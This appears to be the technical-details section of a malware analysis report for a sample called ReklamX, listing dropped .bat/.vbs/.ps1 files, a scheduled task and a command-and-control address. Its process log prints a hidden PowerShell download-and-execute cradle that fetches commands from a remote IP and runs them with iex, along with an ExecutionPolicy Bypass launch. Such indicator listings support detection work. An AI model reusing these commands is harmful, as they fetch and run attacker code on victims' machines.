Technical Information
- <SYSTEM32>\tasks\reklamx
- C:\users\public\reklamx.bat
- C:\users\public\reklamx.vbs
- '18#.#1.157.219':222
- http://18#.##.157.219:222/1.txt via 18#.#1.157.219
- http://18#.##.157.219:222/.xxx.jpg via 18#.#1.157.219
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\ReklamX.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $xmldoc = New-Object System.Xml.XmlDocument; $xmldoc.'Load'('http://185.81.157.219:222/1.txt'); iex $xmldoc.command.a.execute' (with hidden window)
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\ReklamX.vbs"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\ReklamX.bat" "' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $xmldoc = New-Object System.Xml.XmlDocument; $xmldoc.'Load'('http://185.81.157.219:222/1.txt'); iex $xmldoc.command.a.execute
- '<SYSTEM32>\taskeng.exe' {CC2356BB-36A7-4BB4-9EBD-ECFE41A307EE} S-1-5-21-1238866942-1249195528-555854008-1000:spujdasx\user:Interactive:[1]
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\ReklamX.bat" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\ReklamX.ps1'"